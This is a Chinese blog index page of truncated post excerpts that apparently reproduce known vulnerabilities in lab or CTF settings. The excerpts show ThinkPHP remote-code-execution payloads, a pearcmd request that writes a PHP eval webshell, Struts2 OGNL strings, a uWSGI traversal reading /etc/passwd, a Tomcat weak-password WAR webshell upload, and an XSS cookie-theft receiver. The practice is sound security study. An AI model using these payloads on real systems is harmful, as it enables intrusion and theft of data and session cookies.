会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
大雪深埋
博客园
首页
新随笔
联系
订阅
管理
2026年2月3日
CVE-2018-20062
摘要: CVE-2018-20062复现 打开网站 判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错 利用post请求,执行命令 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /
阅读全文
posted @ 2026-02-03 19:51 大雪深埋
阅读(1)
评论(0)
推荐(0)
2026年2月1日
Level 11 → Level 12
摘要: 使用上一关密码ssh连接 ssh -p 2220 bandit11@bandit.labs.overthewire.org ls查看到一个data.txt文件,cat一下 题目提示rot13,rot13就是将每个字母替换为字母表中向后13位的字母 echo "Gur cnffjbeq vf 7k16
阅读全文
posted @ 2026-02-01 13:50 大雪深埋
阅读(2)
评论(0)
推荐(0)
2026年1月28日
uWSGI 目录穿越(CVE-2018-7490)
摘要: 可以使用..%2f..%2f..%2f..%2f..%2fetc/passwd来读取敏感信息 flag一进去在phpinfo页面能直接看到
阅读全文
posted @ 2026-01-28 20:41 大雪深埋
阅读(3)
评论(0)
推荐(0)
thinkphp3.2.x 代码执行
摘要: 首先使用bp抓包, 返回包提示发生错误,证明被记入了日志。 该日志默认路径在:(日志文件名与记录的时间有关) \Application\Runtime\Logs\Common\26_01_28.log 完整payload /index.php?m=Home&c=Index&a=index&value
阅读全文
posted @ 2026-01-28 10:22 大雪深埋
阅读(1)
评论(0)
推荐(0)
2026年1月22日
web入门311-320
摘要: web311 web312 web313 web314 web315 web316 反射型xss 方法一:利用在线平台https://xssaq.com/dashboard 方法二:自己搭服务器,用来接受cookie <?php $cookie = $_GET['cookie']; $time =
阅读全文
posted @ 2026-01-22 15:03 大雪深埋
阅读(9)
评论(0)
推荐(0)
2026年1月21日
thinkphp lang 命令执行
摘要: 使用网上的exp /public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php 要
阅读全文
posted @ 2026-01-21 16:53 大雪深埋
阅读(4)
评论(0)
推荐(0)
struts2 代码执行 (CVE-2016-3087)
摘要: 直接使用网络上的exp (%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.
阅读全文
posted @ 2026-01-21 14:19 大雪深埋
阅读(3)
评论(0)
推荐(0)
tomcat-pass-getshell 弱口令
摘要: 使用弱口令登录,账号密码都是tomcat 使用哥斯拉生成jsp木马 使用jar cvf abc.war test.jsp生成war包 ![image] 上传war包,哥斯拉连接 查看flag
阅读全文
posted @ 2026-01-21 13:21 大雪深埋
阅读(3)
评论(0)
推荐(0)
2026年1月20日
struts2 代码执行 (CVE-2016-4438)
摘要: 利用网上的exp (%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apa
阅读全文
posted @ 2026-01-20 20:57 大雪深埋
阅读(2)
评论(0)
推荐(0)
thinkphp 代码执行 (CNVD-2018-24942)
摘要: exp ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp
阅读全文
posted @ 2026-01-20 20:42 大雪深埋
阅读(4)
评论(0)
推荐(0)
下一页
公告